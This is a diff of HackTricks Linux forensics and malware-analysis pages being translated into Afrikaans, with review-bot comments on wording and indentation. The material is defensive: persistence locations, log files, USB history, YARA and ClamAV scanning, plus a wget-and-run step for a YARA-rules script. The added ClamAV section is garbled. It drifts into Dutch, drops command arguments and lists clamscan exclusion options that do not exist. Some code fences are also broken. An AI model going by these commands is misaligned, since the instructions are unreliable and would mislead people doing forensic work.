@@ -250,63 +253,62 @@ cat /var/spool/cron/crontabs/* \ #MacOS ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ``` +### Dienste -### Services +Paaie waar 'n kwaadwillige program as 'n diens geïnstalleer kan word: -Paths where a malware could be isntalled as a service: - -- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts. -- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions. -- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts. -- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant. -- **/etc/systemd/system**: A directory for system and service manager scripts. -- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel. -- **/usr/local/etc/rc.d/**: For custom or third-party services. -- **~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware. -- **/lib/systemd/system/**: System-wide default unit files provided by installed packages. +- **/etc/inittab**: Roep inisialiseringsskripte soos rc.sysinit aan, wat verder verwys na opstartskripte. +- **/etc/rc.d/** en **/etc/rc.boot/**: Bevat skripte vir diensopstart, waarvan die laasgenoemde in ouer Linux-weergawes gevind word. +- **/etc/init.d/**: Word gebruik in sekere Linux-weergawes soos Debian om opstartskripte te stoor. +- Dienste kan ook geaktiveer word via **/etc/inetd.conf** of **/etc/xinetd/**, afhangende van die Linux-variant. +- **/etc/systemd/system**: 'n Gids vir stelsel- en diensbestuurskripte. +- **/etc/systemd/system/multi-user.target.wants/**: Bevat skakels na dienste wat in 'n multi-gebruiker vlak gestart moet word. +- **/usr/local/etc/rc.d/**: Vir aangepaste of derdeparty-dienste. 
+- **~/.config/autostart/**: Vir gebruikersspesifieke outomatiese opstarttoepassings, wat 'n versteekte plek vir gebruikersgerigte kwaadwillige programme kan wees. +- **/lib/systemd/system/**: Stelselwye verstek eenheidslêers wat deur geïnstalleerde pakkette voorsien word. -### Kernel Modules +### Kernelmodules -Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include: +Linux-kernelmodules, dikwels deur kwaadwillige programme as rootkit-komponente gebruik, word by stelselopstart gelaai. Die kritieke gids en lêers vir hierdie modules sluit in: -- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version. -- **/etc/modprobe.d**: Contains configuration files to control module loading. -- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings. +- **/lib/modules/$(uname -r)**: Bevat modules vir die lopende kernelweergawe. +- **/etc/modprobe.d**: Bevat konfigurasie-lêers om modulelaaiing te beheer. +- **/etc/modprobe** en **/etc/modprobe.conf**: Lêers vir globale module-instellings. -### Other Autostart Locations +### Ander outomatiese opstartlokasies -Linux employs various files for automatically executing programs upon user login, potentially harboring malware: +Linux maak gebruik van verskeie lêers om programme outomaties uit te voer wanneer 'n gebruiker aanmeld, wat potensieel kwaadwillige programme kan bevat: -- **/etc/profile.d/***, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login. -- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, and **~/.config/autostart**: User-specific files that run upon their login. -- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment. +- **/etc/profile.d/***, **/etc/profile**, en **/etc/bash.bashrc**: Uitgevoer vir enige gebruikersaanmelding. 
+- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, en **~/.config/autostart**: Gebruikersspesifieke lêers wat uitgevoer word wanneer hulle aanmeld. +- **/etc/rc.local**: Word uitgevoer nadat alle stelseldienste gestart het, wat die einde van die oorgang na 'n multi-gebruiker omgewing aandui. -## Examine Logs +## Ondersoek Loglêers -Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include: +Linux-stelsels hou gebruikersaktiwiteite en stelselgebeure by deur middel van verskeie loglêers. Hierdie loglêers is van kritieke belang vir die identifisering van ongemagtigde toegang, kwaadwillige infeksies en ander sekuriteitsvoorvalle. Sleutelloglêers sluit in: -- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities. -- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins. - - Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events. -- **/var/log/boot.log**: Contains system startup messages. -- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services. -- **/var/log/kern.log**: Stores kernel messages, including errors and warnings. -- **/var/log/dmesg**: Holds device driver messages. -- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations. -- **/var/log/cron**: Logs cron job executions. -- **/var/log/daemon.log**: Tracks background service activities. -- **/var/log/btmp**: Documents failed login attempts. -- **/var/log/httpd/**: Contains Apache HTTPD error and access logs. -- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities. -- **/var/log/xferlog**: Records FTP file transfers. 
-- **/var/log/**: Always check for unexpected logs here. +- **/var/log/syslog** (Debian) of **/var/log/messages** (RedHat): Vang stelselwye boodskappe en aktiwiteite op. +- **/var/log/auth.log** (Debian) of **/var/log/secure** (RedHat): Neem outentiseringspogings, suksesvolle en mislukte aanmeldings op. +- Gebruik `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` om relevante outentiseringsgebeure te filter. +- **/var/log/boot.log**: Bevat stelselopstartboodskappe. +- **/var/log/maillog** of **/var/log/mail.log**: Log e-posbedieneraktiwiteite, nuttig vir die opspoor van e-posverwante dienste. +- **/var/log/kern.log**: Stoor kernelboodskappe, insluitend foute en waarskuwings. +- **/var/log/dmesg**: Bevat toestuurprogramboodskappe. +- **/var/log/faillog**: Neem mislukte aanmeldingspogings op, wat help met sekuriteitskrisisondersoeke. +- **/var/log/cron**: Log cron-werkuitvoerings. +- **/var/log/daemon.log**: Volg agtergronddiensaktiwiteite. +- **/var/log/btmp**: Dokumenteer mislukte aanmeldingspogings. +- **/var/log/httpd/**: Bevat Apache HTTPD-fout- en toegangsloglêers. +- **/var/log/mysqld.log** of **/var/log/mysql.log**: Log MySQL-databasisaktiwiteite. +- **/var/log/xferlog**: Neem FTP-lêeroordragte op. +- **/var/log/**: Kontroleer altyd vir onverwagte loglêers hier. {% hint style="info" %} -Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. +Linux-stelselloglêers en oudit-subsisteme kan gedeaktiveer of uitgewis word tydens 'n inbreuk of kwaadwillige voorval. 
Omdat loglêers op Linux-stelsels gewoonlik van die nuttigste inligting oor kwaadwillige aktiwiteite bevat, verwyder indringers dit gereeld. Daarom is dit belangrik om, wanneer beskikbare loglêers ondersoek word, te kyk vir gaping of uit plek ininskrywings wat 'n aanduiding van uitwissing of manipulasie kan wees. {% endhint %} -**Linux maintains a command history for each user**, stored in: +**Linux hou 'n opdraggeskiedenis vir elke gebruiker by**, gestoor in: - ~/.bash_history - ~/.zsh_history 
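Review bot: in the log list of this hunk the sub-bullet `+- Gebruik `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` ...` lost its two-space indent, so it is now a top-level entry rather than the child of the `/var/log/auth.log` bullet it explains; restore the indent. "toestuurprogramboodskappe" for `/var/log/dmesg` is not a word; "toestelbestuurderboodskappe" (device driver messages) is the intended meaning. In the hint, "te kyk vir gaping of uit plek ininskrywings" should read "te kyk vir gapings of inskrywings wat nie in volgorde is nie", and "kwaadwillige infeksies" in the introductory paragraph should be "malware-infeksies" to match the term used elsewhere on the page.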
@@ -314,42 +316,39 @@ Linux system logs and audit subsystems may be disabled or deleted in an intrusio - ~/.python_history - ~/.*_history -Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins. +Verder verskaf die `last -Faiwx`-opdrag 'n lys van gebruikersaanmeldings. Kontroleer dit vir onbekende of onverwagte aanmeldings. -Check files that can grant extra rprivileges: +Kontroleer lêers wat ekstra regte kan verleen: -- Review `/etc/sudoers` for unanticipated user privileges that may have been granted. -- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted. -- Examine `/etc/groups` to identify any unusual group memberships or permissions. -- Examine `/etc/passwd` to identify any unusual group memberships or permissions. +- Ondersoek `/etc/sudoers` vir onverwagte gebruikersregte wat moontlik toegeken is. +- Ondersoek `/etc/sudoers.d/` vir onverwagte gebruikersregte wat moontlik toegeken is. +- Ondersoek `/etc/groups` om enige ongewone groepslidmaatskappe of -regte te identifiseer. +- Ondersoek `/etc/passwd` om enige ongewone groepslidmaatskappe of -regte te identifiseer. -Some apps alse generates its own logs: +Sommige programme genereer ook hul eie loglêers: -- **SSH**: Examine _~/.ssh/authorized_keys_ and _~/.ssh/known_hosts_ for unauthorized remote connections. -- **Gnome Desktop**: Look into _~/.recently-used.xbel_ for recently accessed files via Gnome applications. -- **Firefox/Chrome**: Check browser history and downloads in _~/.mozilla/firefox_ or _~/.config/google-chrome_ for suspicious activities. -- **VIM**: Review _~/.viminfo_ for usage details, such as accessed file paths and search history. -- **Open Office**: Check for recent document access that may indicate compromised files. -- **FTP/SFTP**: Review logs in _~/.ftp_history_ or _~/.sftp_history_ for file transfers that might be unauthorized. 
-- **MySQL**: Investigate _~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities. -- **Less**: Analyze _~/.lesshst_ for usage history, including viewed files and commands executed. -- **Git**: Examine _~/.gitconfig_ and project _.git/logs_ for changes to repositories. +- **SSH**: Ondersoek _~/.ssh/authorized_keys_ en _~/.ssh/known_hosts_ vir ongemagtigde afstandsverbindinge. +- **Gnome Desktop**: Kyk na _~/.recently-used.xbel_ vir onlangs benaderde lêers via Gnome-toepassings. +- **Firefox/Chrome**: Kontroleer blaaiergeskiedenis en aflaaiers in _~/.mozilla/firefox_ of _~/.config/google-chrome_ vir verdagte aktiwiteite. +- **VIM**: Ondersoek _~/.viminfo_ vir gebruiksdetails, soos benaderde lêerpaadjies en soekgeskiedenis. +- **Open Office**: Kyk vir onlangse dokumenttoegang wat dui op gekompromitteerde lêers. +- **FTP/SFTP**: Ondersoek loglêers in _~/.ftp_history_ of _~/.sftp_history_ vir lêeroordragte wat moontlik ongemagtig is. +- **MySQL**: Ondersoek _~/.mysql_history_ vir uitgevoerde MySQL-navrae, wat moontlik ongemagtigde databasisaktiwiteite kan onthul. +- **Less**: Analiseer _~/.lesshst_ vir gebruiksgeskiedenis, insluitend besigtigde lêers en uitgevoerde opdragte. +- **Git**: Ondersoek _~/.gitconfig_ en projek _.git/logs_ vir veranderinge aan bewaarplekke. -### USB Logs +### USB-loglêers -[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. +[**usbrip**](https://github.com/snovvcrash/usbrip) is 'n klein stukkie sagteware wat in suiwer Python 3 geskryf is en Linux-loglêers (`/var/log/syslog*` of `/var/log/messages*` afhangende van die distribusie) ontleed om USB-gebeurtenisgeskiedenis-tabelle saam te stel. 
-It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USBs to find "violation events" (the use of USBs that aren't inside that list). - -### Installation +Dit is interessant om **alle USB's wat gebruik is**, te ken en dit sal nuttiger wees as jy 'n geoorloofde lys van USB's het om "oortredingsgebeure" (die gebruik van USB's wat nie binne daardie lys val nie) te vind. +### Installasie ```bash pip3 install usbrip usbrip ids download #Download USB ID database ``` - -### Examples - +### Voorbeelde ```bash usbrip events history #Get USB history of your curent linux machine usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user @@ -357,115 +356,109 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR usbrip ids download #Downlaod database usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid ``` - -More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) +Meer voorbeelde en inligting binne die github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Review User Accounts and Logon Activities +## Oorsig van Gebruikersrekeninge en Aantekenaktiwiteite -Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ -Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ -Finally, look for accounts with **no passwords** or **easily guessed** passwords. +Ondersoek die _**/etc/passwd**_, _**/etc/shadow**_ en **sekuriteitslêers** vir ongewone name of rekeninge wat geskep is en/of gebruik is in die nabyheid van bekende ongemagtigde gebeure. Kyk ook na moontlike sudo-bruteforce-aanvalle.\ +Verder, kyk na lêers soos _**/etc/sudoers**_ en _**/etc/groups**_ vir onverwagte voorregte wat aan gebruikers gegee is.\ +Kyk uiteindelik vir rekeninge sonder wagwoorde of maklik raai wagwoorde. -## Examine File System +## Ondersoek Lêersisteem -### Analyzing File System Structures in Malware Investigation +### Analise van Lêersisteemstrukture in Malware-ondersoek -When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. 
However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage. +Wanneer malware-voorvalle ondersoek word, is die struktuur van die lêersisteem 'n belangrike bron van inligting wat beide die volgorde van gebeure en die inhoud van die malware onthul. Tog ontwikkel malware-skrywers tegnieke om hierdie analise te bemoeilik, soos die wysiging van lêerstempels of die vermyding van die lêersisteem vir data-opberging. -To counter these anti-forensic methods, it's essential to: - -- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data. -- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers. -- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files. -- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content. -- **Identify setuid root files** using the command: - ```find / -user root -perm -04000 -print``` - This finds files with elevated permissions, which could be abused by attackers. -- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans. -- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together. -- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware. +Om hierdie teen-forensiese metodes te teenwerk, is dit noodsaaklik om: +- **'n Deeglike tydlyn-analise uit te voer** met behulp van instrumente soos **Autopsy** om gebeurtenis-tydlyne te visualiseer of **Sleuth Kit se** `mactime` vir gedetailleerde tydlyn-data. 
+- **Onverwagte skripte in die $PATH van die stelsel te ondersoek**, wat skulpskote of PHP-skripte wat deur aanvallers gebruik word, kan insluit. +- **`/dev` te ondersoek vir ongewone lêers**, aangesien dit tradisioneel spesiale lêers bevat, maar moontlik malware-verwante lêers kan huisves. +- **Te soek na verskuilde lêers of gidslyne** met name soos ".. " (punt punt spasie) of "..^G" (punt punt beheer-G), wat kwaadwillige inhoud kan verberg. +- **Setuid-root-lêers te identifiseer** met behulp van die opdrag: +```find / -user root -perm -04000 -print``` +Dit vind lêers met verhoogde voorregte wat deur aanvallers misbruik kan word. +- **Verwyderingstempelmerkers** in inode-tabelle te hersien om massiewe lêerverwyderings op te spoor, wat moontlik die teenwoordigheid van rootkits of trojane aandui. +- **Opeenvolgende inodes te ondersoek** vir nabygeleë kwaadwillige lêers nadat een geïdentifiseer is, aangesien hulle saam geplaas kon wees. +- **Gewone binêre gidslyne** (_/bin_, _/sbin_) te ondersoek vir onlangs gewysigde lêers, aangesien hierdie deur malware gewysig kon word. ```bash -# List recent files in a directory: +# List recent files in a directory: ls -laR --sort=time /bin``` -# Sort files in a directory by inode: +# Sort files in a directory by inode: ls -lai /bin | sort -n``` ``` - {% hint style="info" %} -Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. +Let daarop dat 'n **aanvaller** die **tyd** kan **verander** om **lêers te laat voorkom** asof dit **wettig** is, maar hy kan die **inode** nie verander nie. 
As jy vind dat 'n **lêer** aandui dat dit geskep en verander is op dieselfde tyd as die res van die lêers in dieselfde vouer, maar die **inode** onverwags groter is, dan is die **tydstempels van daardie lêer verander**. {% endhint %} -## Compare files of different filesystem versions +## Vergelyk lêers van verskillende lêersisteemweergawes -### Filesystem Version Comparison Summary +### Opsomming van Vergelyking van Lêersisteemweergawes -To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands: +Om lêersisteemweergawes te vergelyk en veranderinge te identifiseer, gebruik ons vereenvoudigde `git diff`-opdragte: -- **To find new files**, compare two directories: +- **Om nuwe lêers te vind**, vergelyk twee gidsen: ```bash git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/ ``` - -- **For modified content**, list changes while ignoring specific lines: +- **Vir gewysigde inhoud**, lys veranderinge terwyl spesifieke lyne geïgnoreer word: ```bash git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time" ``` - -- **To detect deleted files**: +- **Om uitgewisde lêers op te spoor**: ```bash git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ ``` +- **Filteropsies** (`--diff-filter`) help om te versmalling na spesifieke veranderinge soos bygevoeg (`A`), verwyder (`D`), of gewysig (`M`) lêers. +- `A`: Bygevoegde lêers +- `C`: Gekopieerde lêers +- `D`: Verwyderde lêers +- `M`: Gewysigde lêers +- `R`: Hernoemde lêers +- `T`: Tipe veranderinge (bv. lêer na simbooliese skakel) +- `U`: Onversoenbare lêers +- `X`: Onbekende lêers +- `B`: Gebroke lêers -- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files. 
- - `A`: Added files - - `C`: Copied files - - `D`: Deleted files - - `M`: Modified files - - `R`: Renamed files - - `T`: Type changes (e.g., file to symlink) - - `U`: Unmerged files - - `X`: Unknown files - - `B`: Broken files - -## References +## Verwysings * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) * [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203) -* **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides** +* **Boek: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -**Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). 
+**Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index 2331fd321..e36882c30 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -1,24 +1,24 @@ -# Malware Analysis +# Malware Analise
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Forensics CheatSheets +## Forensiese Spiekbriefies [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/) -## Online Services +## Aanlyn Dienste * [VirusTotal](https://www.virustotal.com/gui/home/upload) * [HybridAnalysis](https://www.hybrid-analysis.com) 
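Review bot: the title `# Malware Analise` is inconsistent with how this same page is linked elsewhere in this PR, where `../malware-analysis.md` is rendered as **Malware-analise** (memory-dump-analysis README); Afrikaans writes the compound as "Malware-analise", so use that form in the title as well.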
@@ -26,136 +26,249 @@ Other ways to support HackTricks: * [Intezer](https://analyze.intezer.com) * [Any.Run](https://any.run/) -## Offline Antivirus and Detection Tools +## Aflyn Antivirus en Opvangs Gereedskap ### Yara -#### Install - +#### Installeer ```bash sudo apt-get install -y yara ``` +#### Maak reëls gereed -#### Prepare rules - -Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware. - +Gebruik hierdie skrip om al die yara malware reëls vanaf GitHub af te laai en saam te voeg: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Skep die _**reëls**_ gids en voer dit uit. Dit sal 'n lêer genaamd _**malware\_rules.yar**_ skep wat al die yara reëls vir malware bevat. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules python malware_yara_rules.py ``` +#### Skandering -#### Scan +Om te begin met die analise van malware, is dit belangrik om 'n skandering uit te voer op die verdagte lêer. Hierdie skandering sal help om enige bekende malware te identifiseer en om te bepaal of die lêer 'n potensiële bedreiging is. +Daar is verskeie skanderingstegnieke wat gebruik kan word, soos die gebruik van 'n antivirusprogram, 'n sandboks, of 'n statiese analisehulpmiddel. Dit is belangrik om 'n betroubare en up-to-date skanderingstegniek te gebruik om die beste resultate te verseker. + +Die skandering moet uitgevoer word op 'n geïsoleerde stelsel of in 'n virtuele omgewing om te voorkom dat die malware versprei of skade aanrig. 
Dit is ook belangrik om die skandering uit te voer met behulp van 'n gebruiker met beperkte regte om te voorkom dat die malware bevoorregte toegang verkry. + +As die skandering 'n bekende malware identifiseer, moet die nodige stappe geneem word om die malware te verwyder en die impak daarvan te beperk. As die skandering egter nie enige bekende malware identifiseer nie, moet verdere analise uitgevoer word om die aard en funksionaliteit van die lêer te bepaal. ```bash yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` +#### YaraGen: Kontroleer vir malware en Skep reëls -#### YaraGen: Check for malware and Create rules - -You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) - +Jy kan die instrument [**YaraGen**](https://github.com/Neo23x0/yarGen) gebruik om yara-reëls te genereer vanaf 'n binêre lêer. 
Kyk na hierdie tutoriale: [**Deel 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deel 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deel 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash - python3 yarGen.py --update - python3.exe yarGen.py --excludegood -m ../../mals/ +python3 yarGen.py --update +python3.exe yarGen.py --excludegood -m ../../mals/ ``` - ### ClamAV -#### Install +#### Installeer +```bash +sudo apt-get install clamav +``` + +#### Bijwerken van de virusdefinities + +```bash +sudo freshclam +``` + +#### Scannen van een bestand + +```bash +clamscan +``` + +#### Scannen van een map + +```bash +clamscan -r +``` + +#### Scannen van het hele systeem + +```bash +clamscan -r / +``` + +#### Rapport genereren van de scanresultaten + +```bash +clamscan -r --log=.log / +``` + +#### Quarantaine van geïnfecteerde bestanden + +```bash +clamscan -r --move= / +``` + +#### Verwijderen van geïnfecteerde bestanden + +```bash +clamscan -r --remove / +``` + +#### Uitsluiten van bestanden of mappen van de scan + +```bash +clamscan -r --exclude= / +``` + +#### Uitsluiten van specifieke bestandsextensies van de scan + +```bash +clamscan -r --exclude=".extensie" / +``` + +#### Uitsluiten van specifieke bestandstypen van de scan + +```bash +clamscan -r --exclude="type/bestand" / +``` + +#### Uitsluiten van specifieke bestandsgroottes van de scan + +```bash +clamscan -r --exclude=">grootte" / +``` + +#### Uitsluiten van specifieke bestandskenmerken van de scan + +```bash +clamscan -r --exclude="kenmerk" / +``` + +#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van reguliere expressies + +```bash +clamscan -r --exclude="regex:patroon" / +``` + +#### Uitsluiten van specifieke bestanden of mappen van de scan met behulp van een lijst + +```bash +clamscan -r --exclude-from= / +``` + +#### Uitsluiten van specifieke 
